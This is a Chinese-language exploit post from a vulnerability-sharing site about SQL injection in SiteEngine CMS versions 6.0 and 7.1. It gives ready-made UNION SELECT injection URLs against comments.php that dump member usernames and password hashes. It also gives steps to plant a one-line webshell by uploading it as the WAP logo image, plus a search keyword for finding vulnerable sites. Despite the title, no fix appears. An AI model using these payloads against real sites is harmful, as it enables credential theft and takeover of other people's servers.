漏洞时代 - 最新漏洞_0DaY5.CoM漏洞时代 - 最新漏洞_0DaY5.CoM

SiteEngine 6.0 &7.1 SQL注入漏洞及修复

#############################################################################
#标题:   SiteEngine 6.0 SQL注入漏洞
#日期:    2010-11-25
#作者: Beach
#Team:    www.linux520.com
#厂商: www.siteengine.netwww.boka.cn
#关键字:    "Powered by SiteEngine"   //300,000 +~
#############################################################################
[*]描述:
利用这个漏洞需要评论功能开启(默认开启)
#############################################################################
[*]利用:

[php]

php?id=1&module=news+m,boka_newsclass+c+where+1=2+union+select+1,2,group_concat(username,0x3a,password,0x3c62723e),4,5">http://server/comments.php?id=1&module=news+m,boka_newsclass+c+where+1=2+union+select+1,2,group_concat(username,0x3a,password,0x3c62723e),4,5, ... ,24,25,26+from+boka_members%23[/php]

#############################################################################
[*]上Shell:

管理后台:http://server/admin/
系统维护---> wap设置---> 请上传wap logo图 (有大小限制,10k以内,传一句话即可) --->
确定--->马上浏览--->看图片属性即为一句话地址

#############################################################################

 

?

#############################################################################
#标题:   SiteEngine 7.1 SQL注入漏洞
#日期:    2010-11-25
#作者:    Beach
#Team:    www.linux520.com
#厂商:    www.siteengine.netwww.boka.cn
#关键字:    "Powered by SiteEngine"   //300,000 +~
#############################################################################
[*]描述:
利用这个漏洞需要评论功能开启,默认开启
#############################################################################
[*]利用:

企业门户版本:
[php]http://server/comments.php?id=1&module=newstopic+m,boka_newstopicclass+c+where+1=2+union+select+1,2,concat(username,0x3a,password),4,5,6,...,38,39+from+boka_members%23[/php]

[php]http://server/comments.php?id=1&module=news+m,boka_newsclass+c+where+1=2+union+select+1,2,concat(username,0x3a,password),4,5,6,...,26,27+from+boka_members%23[/php]

可能字段数不一样, 自己尝试
==============================================================================
电子商务版本:

[php]http://server/comments.php?id=1&module=news+m,boka_newsclass+c+where+1=2+union+select+1,2,password,4,5,6,...,37,38+from+boka_members%23[/php]
#############################################################################

其他版本类似
#############################################################################
[*]上Shell:

管理后台:http://server/admin/
系统维护---> wap设置---> 请上传wap logo图 (有大小限制,10k以内,传一句话即可) --->
确定--->马上浏览--->看图片属性即为一句话地址
#############################################################################

本原创文章未经允许不得转载 | 当前页面:漏洞时代 - 最新漏洞_0DaY5.CoM » SiteEngine 6.0 &7.1 SQL注入漏洞及修复

评论